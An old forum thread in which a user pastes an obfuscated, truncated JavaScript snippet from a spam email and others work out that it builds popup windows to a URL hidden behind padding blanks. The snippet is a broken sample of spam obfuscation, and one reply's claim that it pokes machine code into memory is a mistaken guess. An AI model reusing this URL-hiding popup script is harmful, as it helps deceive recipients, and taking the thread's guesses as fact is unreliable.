What is someone trying to SPAM me with?

Got this in the email today:

=0;foSmb8UqOw--)
{fo3Mb8uq0w+=almoOdOGLaS.charAt(foSmb8UqOw);}for(foSmb8UqOw=fo3Mb8uq0wlength-1;foSmb8UqOw>=0;foSmb8UqOw--){if
(fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35 <
41)fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35)+82);else
fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35));
}for(foSmb8UqOw=fo3Mb8uq0W.length-1;foSmb8UqOw>=0;foSmb8UqOw--){fO3Mb8uq0w+=fo3Mb8uq0W.charAt(foSmb8UqOw);}fO3Mb8Uq0w
= fO3Mb8uq0w;alM0od0G7aS = fI9mXy5Zd;fo3Mb8uq0w=
"";fO3Mb8uq0w= "";almoOdOGLaS = "";fo3Mb8uq0W= "";
for(foSmb8UqOw=0;foSmb8UqOw=0;foSmb8UqOw--){fo3Mb8uq0w+=almoOdOGLaS.charAt(foSmb8UqOw);
}for(foSmb8UqOw=fo3Mb8uq0w.length-1;foSmb8UqOw>=0;foSmb8UqOw--){if
(fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35 <
41)fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35)+82);else
fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35));}for(foSmb8UqOw=fo3Mb8uq0W.length-1;foSmb8UqOw>=0;foSmb8UqOw--){fO3Mb8uq0w+=fo3Mb8uq0W.charAt(foSmb8UqOw);}fOSMb8Uq0w
= fO3Mb8uq0w;j6k0mXry9="0";alMoOd0G7aS=fI9mXy5zd;almoOdOGLaS =
""; fo3Mb8uq0W=
"";m5sXt0o1f=String.fromCharCode(104,0x74,0164,0160,0x3a,057,0+47,040,040,32,32,040,0x20,0+32,0x20,040,040,32,040,0x20,0+32,040,32,040,0x20,0+32,0+32,0x20,040,040,32,32,040,0x20,0+32,0x20,0+32,0x20,040,040,32,32,040,0x20,0+32,0x20,040,040,32,32,040,0x20,0+32,0x20,040,040,32,32,040,0x20,0+32,040,0x20,0+32,0x20,040,040,32,040,0x20,0+32,0x20,040,040,32,040,0x20,0+32,0x20,040,040,32,32,040,0x20,0+32,0x20,040,040,32,040,0x20,0+32,040,040,32,32,040,0x20,0+32,0x20,040,040,32,32,040,0x20,0+32,040,0x20,0+32,0x20,040,040,32,040,0x20,0+32,0x20,040,040,32,040,0x20,0+32,0x20,040,040,32,32,040,0x20,0+32,0x20,040,040,32,040,0x20,0+32,0100);fO3Mb8uq0w=
"";fo3Mb8uq0w= "";
j6k0MXry9="0";for(foSmb8UqOw=0;foSmb8UqOw=0;foSmb8UqOw--){fo3Mb8uq0w+=almoOdOGLaS.charAt(foSmb8UqOw);}for(foSmb8UqOw=fo3Mb8uq0w.length-1;foSmb8UqOw>=0;foSmb8UqOw--){if
(fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%8-35 <
41)fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35)+89);
else
fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35));
}for(foSmb8UqOw=fo3Mb8uq0W.length-1;foSmb8UqOw>=0;foSmb8UqOw--){fO3Mb8uq0w+=fo3Mb8uq0W.charAt(foSmb8UqOw);}fOSMbSUq0w
= fO3Mb8uq0w;almoOdOGLaS =
"";j6k0mxry9="1";fo3Mb8uq0w="";fo3Mb8uq0W= "";alMoOdOG7aS =
fI9mxy5zd;fO3Mb8uq0w=
"";for(foSmb8UqOw=0;foSmb8UqOw=0;foSmb8UqOw--){fo3Mb8uq0w+=almoOdOGLaS.charAt(foSmb8UqOw);
}le5bKk3d9=100;for(foSmb8UqOw=fo3Mb8uq0w.length-1;foSmb8UqOw>=0;foSmb8UqOw--){if
(fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35 <
12)fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35)+90);else
fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35))
;}for(foSmb8UqOw=fo3Mb8uq0W.length-1;foSmb8UqOw>=0;foSmb8UqOw--){fO3Mb8uq0w+=fo3Mb8uq0W.charAt(foSmb8UqOw);}fOSMrSuq0w
= fO3Mb8uq0w;alMoOdOGLaS = fi9mXy5zd;almoOdOGLaS =
"";fo3Mb8uq0w=
"";dfDSdn4mDq="0";fo3Mb8uq0W="";fO3Mb8uq0w="";for(foSmb8UqOw=0;foSmb8UqOw=0;foSmb8UqOw--){fo3Mb8uq0w+=almoOdOGLaS.charAt(foSmb8UqOw);}loe5bKk3d9=600;for(foSmb8UqOw=fo3Mb8uq0w.length-1;foSmb8UqOw>=0;foSmb8UqOw--)
{if (fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-16 <
33)fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-16)+89);
else
fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-16));}for(foSmb8UqOw=fo3Mb8uq0W.length-1;foSmb8UqOw>=0;foSmb8UqOw--){fO3Mb8uq0w+=fo3Mb8uq0W.charAt(foSmb8UqOw);}fOSmrSuq0w
=
fO3Mb8uq0w;loe5bkK3d9=800;dfD8dn4MDq=100;SKvbbR45h=j6k0mXry9+String.fromCharCode(0x2c,0164,0x69,0+116,0154,101,0+98,0x61,0162,075);fdlkhHg8h=loe5bKk3d9+String.fromCharCode(0x2c,0155,0x65,110,0x75,98,0141,0x72,0+61);
jrhtDERff=j6k0mxry9+String.fromCharCode(0x2c,0163,0x74,0+97,0+116,0165,115,0+61);hty87fdq2=j6k0MXry9+String.fromCharCode(0x2c,0154,0x65,0x66,116,0+61);dFGgh54FG=dfD8dn4mDq+String.fromCharCode(0x2c,0162,101,115,0151,0x7a,0x61,98,0x6c,0145,075);FGhnJ7uk5=dfDSdn4mDq+String.fromCharCode(0x2c,0163,0143,0+114,111,0154,0+108,0142,97,0162,0x73,0x3d);kfn4RF8d4=loe5bkK3d9+String.fromCharCode(0x2c,104,101,0151,0x67,0150,116,0x3d);fUT4nvRE8=String.fromCharCode(0x77,0151,100,0164,0x68,075);nG45GJdsr="0"+String.fromCharCode(0x2c,116,0157,0x6f,0154,0142,0x61,0x72,0x3d);
z23rmhj76u=le5bKk3d9+String.fromCharCode(0x2c,0164,111,0+112,075);dnwjOmb3n=""+dfD8dn4MDq;mOky5SLt3=kfn4RF8d4+fdlkhHg8h+fUT4nvRE8+dFGgh54FG+FGhnJ7uk5+nG45GJdsr+hty87fdq2+jrhtDERff+SKvbbR45h+z23rmhj76u+dnwjOmb3n;mOky5sLt3=fUT4nvRE8+kfn4RF8d4+fdlkhHg8h+dFGgh54FG+FGhnJ7uk5+jrhtDERff+SKvbbR45h+nG45GJdsr+hty87fdq2+z23rmhj76u+dnwjOmb3n;
moky5sLt3=fUT4nvRE8+hty87fdq2+kfn4RF8d4+fdlkhHg8h+FGhnJ7uk5+jrhtDERff+dFGgh54FG+SKvbbR45h+nG45GJdsr+z23rmhj76u+dnwjOmb3n;mOky5slt3=z23rmhj76u+fUT4nvRE8+fdlkhHg8h+dFGgh54FG+kfn4RF8d4+FGhnJ7uk5+jrhtDERff+SKvbbR45h+nG45GJdsr+hty87fdq2+dnwjOmb3n;if(almoOdOGLaS==fI9mXy5Zd)window.open(m5sXt0o1f+fOSMrSuq0w,"",mOky5SLt3+dS94gnXs3);else
if(fi9mXy5zd!=fI9mxy5zd)windowopen(m5sXt0o1f+fO3Mb8Uq0w,"",mOky5sLt3+dS94gnXs3);else
if(fI9mXy5zd!=fi9mXy5zd)window.open(m5sXt0o1f+fOSMbSUq0w,"",moky5sLt3+dS94gnXs3);dFGgHS4FG=dfD8dn4mDq+String.fromCharCode(0x2c,0162,101,115,0151,0x7a,0x61,98,0x6c,0145,075);
FGhnJLuK5=dfDSdn4mDq+String.fromCharCode(0x2c,0163,0143,0+114,111,0154,0+108,0142,97,0162,0x73,0x3d);}urlgrey()

I'm assuming it's trying to do some funky stuff with Outlook, but all I'm seeing on my yahoo mail account is what I pasted in above. Any ideas? Just curious.

Post #20,915 by drewk 12/10/01 1:48:46 PM Reply	What is someone trying to SPAM me with? Got this in the email today: =0;foSmb8UqOw--) {fo3Mb8uq0w+=almoOdOGLaS.charAt(foSmb8UqOw);}for(foSmb8UqOw=fo3Mb8uq0wlength-1;foSmb8UqOw>=0;foSmb8UqOw--){if (fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35 < 41)fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35)+82);else fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35)); }for(foSmb8UqOw=fo3Mb8uq0W.length-1;foSmb8UqOw>=0;foSmb8UqOw--){fO3Mb8uq0w+=fo3Mb8uq0W.charAt(foSmb8UqOw);}fO3Mb8Uq0w = fO3Mb8uq0w;alM0od0G7aS = fI9mXy5Zd;fo3Mb8uq0w= "";fO3Mb8uq0w= "";almoOdOGLaS = "";fo3Mb8uq0W= ""; for(foSmb8UqOw=0;foSmb8UqOw=0;foSmb8UqOw--){fo3Mb8uq0w+=almoOdOGLaS.charAt(foSmb8UqOw); }for(foSmb8UqOw=fo3Mb8uq0w.length-1;foSmb8UqOw>=0;foSmb8UqOw--){if (fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35 < 41)fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35)+82);else fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35));}for(foSmb8UqOw=fo3Mb8uq0W.length-1;foSmb8UqOw>=0;foSmb8UqOw--){fO3Mb8uq0w+=fo3Mb8uq0W.charAt(foSmb8UqOw);}fOSMb8Uq0w = fO3Mb8uq0w;j6k0mXry9="0";alMoOd0G7aS=fI9mXy5zd;almoOdOGLaS = ""; fo3Mb8uq0W= "";m5sXt0o1f=String.fromCharCode(104,0x74,0164,0160,0x3a,057,0+47,040,040,32,32,040,0x20,0+32,0x20,040,040,32,040,0x20,0+32,040,32,040,0x20,0+32,0+32,0x20,040,040,32,32,040,0x20,0+32,0x20,0+32,0x20,040,040,32,32,040,0x20,0+32,0x20,040,040,32,32,040,0x20,0+32,0x20,040,040,32,32,040,0x20,0+32,040,0x20,0+32,0x20,040,040,32,040,0x20,0+32,0x20,040,040,32,040,0x20,0+32,0x20,040,040,32,32,040,0x20,0+32,0x20,040,040,32,040,0x20,0+32,040,040,32,32,040,0x20,0+32,0x20,040,040,32,32,040,0x20,0+32,040,0x20,0+32,0x20,040,040,32,040,0x20,0+32,0x20,040,040,32,040,0x20,0+32,0x20,040,040,32,32,040,0x20,0+32,0x20,040,040,32,040,0x20,0+32,0100);fO3Mb8uq0w= "";fo3Mb8uq0w= ""; j6k0MXry9="0";for(foSmb8UqOw=0;foSmb8UqOw=0;foSmb8UqOw--){fo3Mb8uq0w+=almoOdOGLaS.charAt(foSmb8UqOw);}for(foSmb8UqOw=fo3Mb8uq0w.length-1;foSmb8UqOw>=0;foSmb8UqOw--){if (fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%8-35 < 41)fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35)+89); else fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35)); }for(foSmb8UqOw=fo3Mb8uq0W.length-1;foSmb8UqOw>=0;foSmb8UqOw--){fO3Mb8uq0w+=fo3Mb8uq0W.charAt(foSmb8UqOw);}fOSMbSUq0w = fO3Mb8uq0w;almoOdOGLaS = "";j6k0mxry9="1";fo3Mb8uq0w="";fo3Mb8uq0W= "";alMoOdOG7aS = fI9mxy5zd;fO3Mb8uq0w= "";for(foSmb8UqOw=0;foSmb8UqOw=0;foSmb8UqOw--){fo3Mb8uq0w+=almoOdOGLaS.charAt(foSmb8UqOw); }le5bKk3d9=100;for(foSmb8UqOw=fo3Mb8uq0w.length-1;foSmb8UqOw>=0;foSmb8UqOw--){if (fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35 < 12)fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35)+90);else fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35)) ;}for(foSmb8UqOw=fo3Mb8uq0W.length-1;foSmb8UqOw>=0;foSmb8UqOw--){fO3Mb8uq0w+=fo3Mb8uq0W.charAt(foSmb8UqOw);}fOSMrSuq0w = fO3Mb8uq0w;alMoOdOGLaS = fi9mXy5zd;almoOdOGLaS = "";fo3Mb8uq0w= "";dfDSdn4mDq="0";fo3Mb8uq0W="";fO3Mb8uq0w="";for(foSmb8UqOw=0;foSmb8UqOw=0;foSmb8UqOw--){fo3Mb8uq0w+=almoOdOGLaS.charAt(foSmb8UqOw);}loe5bKk3d9=600;for(foSmb8UqOw=fo3Mb8uq0w.length-1;foSmb8UqOw>=0;foSmb8UqOw--) {if (fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-16 < 33)fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-16)+89); else fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-16));}for(foSmb8UqOw=fo3Mb8uq0W.length-1;foSmb8UqOw>=0;foSmb8UqOw--){fO3Mb8uq0w+=fo3Mb8uq0W.charAt(foSmb8UqOw);}fOSmrSuq0w = fO3Mb8uq0w;loe5bkK3d9=800;dfD8dn4MDq=100;SKvbbR45h=j6k0mXry9+String.fromCharCode(0x2c,0164,0x69,0+116,0154,101,0+98,0x61,0162,075);fdlkhHg8h=loe5bKk3d9+String.fromCharCode(0x2c,0155,0x65,110,0x75,98,0141,0x72,0+61); jrhtDERff=j6k0mxry9+String.fromCharCode(0x2c,0163,0x74,0+97,0+116,0165,115,0+61);hty87fdq2=j6k0MXry9+String.fromCharCode(0x2c,0154,0x65,0x66,116,0+61);dFGgh54FG=dfD8dn4mDq+String.fromCharCode(0x2c,0162,101,115,0151,0x7a,0x61,98,0x6c,0145,075);FGhnJ7uk5=dfDSdn4mDq+String.fromCharCode(0x2c,0163,0143,0+114,111,0154,0+108,0142,97,0162,0x73,0x3d);kfn4RF8d4=loe5bkK3d9+String.fromCharCode(0x2c,104,101,0151,0x67,0150,116,0x3d);fUT4nvRE8=String.fromCharCode(0x77,0151,100,0164,0x68,075);nG45GJdsr="0"+String.fromCharCode(0x2c,116,0157,0x6f,0154,0142,0x61,0x72,0x3d); z23rmhj76u=le5bKk3d9+String.fromCharCode(0x2c,0164,111,0+112,075);dnwjOmb3n=""+dfD8dn4MDq;mOky5SLt3=kfn4RF8d4+fdlkhHg8h+fUT4nvRE8+dFGgh54FG+FGhnJ7uk5+nG45GJdsr+hty87fdq2+jrhtDERff+SKvbbR45h+z23rmhj76u+dnwjOmb3n;mOky5sLt3=fUT4nvRE8+kfn4RF8d4+fdlkhHg8h+dFGgh54FG+FGhnJ7uk5+jrhtDERff+SKvbbR45h+nG45GJdsr+hty87fdq2+z23rmhj76u+dnwjOmb3n; moky5sLt3=fUT4nvRE8+hty87fdq2+kfn4RF8d4+fdlkhHg8h+FGhnJ7uk5+jrhtDERff+dFGgh54FG+SKvbbR45h+nG45GJdsr+z23rmhj76u+dnwjOmb3n;mOky5slt3=z23rmhj76u+fUT4nvRE8+fdlkhHg8h+dFGgh54FG+kfn4RF8d4+FGhnJ7uk5+jrhtDERff+SKvbbR45h+nG45GJdsr+hty87fdq2+dnwjOmb3n;if(almoOdOGLaS==fI9mXy5Zd)window.open(m5sXt0o1f+fOSMrSuq0w,"",mOky5SLt3+dS94gnXs3);else if(fi9mXy5zd!=fI9mxy5zd)windowopen(m5sXt0o1f+fO3Mb8Uq0w,"",mOky5sLt3+dS94gnXs3);else if(fI9mXy5zd!=fi9mXy5zd)window.open(m5sXt0o1f+fOSMbSUq0w,"",moky5sLt3+dS94gnXs3);dFGgHS4FG=dfD8dn4mDq+String.fromCharCode(0x2c,0162,101,115,0151,0x7a,0x61,98,0x6c,0145,075); FGhnJLuK5=dfDSdn4mDq+String.fromCharCode(0x2c,0163,0143,0+114,111,0154,0+108,0142,97,0162,0x73,0x3d);}urlgrey() I'm assuming it's trying to do some funky stuff with Outlook, but all I'm seeing on my yahoo mail account is what I pasted in above. Any ideas? Just curious. We have to fight the terrorists as if there were no rules and preserve our open society as if there were no terrorists. -- [link\|http://www.nytimes.com/2001/04/05/opinion/BIO-FRIEDMAN.html\|Thomas Friedman]
Post #20,917 by Another Scott 12/10/01 1:57:55 PM Reply	Try running it through a deobsfucator... Like the one [link\|http://www.swishweb.com/decrypt/ord2char_samp.php\|here] maybe. It seems to be obsfuscated HTML with lots of window.open things. I don't see any virus-like stuff (File stuff), but I'm not an expert. I'd guess it just pops up a bunch of stupid ads, but you can never tell.... HTH. Cheers, Scott.
Post #20,964 by Another Scott 12/10/01 11:06:01 PM Reply	More info. Note the last line of the script: urlgrey() The preceeding "code" defines urlgrey (assuming the initial part of the message was lost somewhere along the way). The last line runs it. [link\|http://www.cereus7.com/UGHome.html\|Urlgrey Tea] is a Basic-like language for applets. Probably not what this is... [link\|http://news.spamcop.net/pipermail/spamcop-list/2001-October/022988.html\|This] post to SpamCop.net discusses a similar obsfuscated script. Perhaps it's even from the same outfit. HTH. Cheers, Scott.
Post #21,038 by scoenye 12/11/01 3:54:05 PM Reply	Looks like it The bottom half builds windowopen("[link\|http://_135_blanks_@"\|http://_135_blanks_@"] + ???_1,"","width=800, height=600, menubar=???_2, resizable=0, scrollbars=1, status=0, titlebar=0, toolbar=0, left=100, top=100" + ???_3); which matches the discussion on SpamCop. The real URL is decoded by the top half, but the seed value is missing. Wondering if deobfuscating this was a violation of the DMCA? ;-)
Post #21,041 by drewk 12/11/01 4:00:09 PM Reply	That's what I figured But on this public terminal, even if I had some tools I could deobfuscate it with, I don't know enough about windows trojan programming to ensure I didn't trigger the damn thing just by trying to read it. Thanks for clearing it up (somewhat). I was wondering if I should report them to their ISP for it, but hell, no harm no foul, right? (Translates as: I don't feel like spending the next three weeks trying to explain to level 1 support that this thing was a nastygram.) We have to fight the terrorists as if there were no rules and preserve our open society as if there were no terrorists. -- [link\|http://www.nytimes.com/2001/04/05/opinion/BIO-FRIEDMAN.html\|Thomas Friedman]
Post #20,962 by nking 12/10/01 10:39:51 PM Reply	I am not sure but it could be embedded VBA scripting code for the latest VBA Virus/Trojan/Worm?
Post #20,968 by Ric Locke 12/10/01 11:27:01 PM Reply	It's code of some kind I spent a few minutes typing the character codes into a binary editor. It's doing some far calls; I know nothing whatever about the internals of Windows or Outlook, so can't tell you what they do, but the script is setting up variables containing arbitrary byte values as strings, then poking them into memory like an old-fashioned Apple Basic program. IOW this is a trojan of some kind. Looks like the starting delimiter got lost somewhere. Regards, Ric

Welcome to IWETHEY!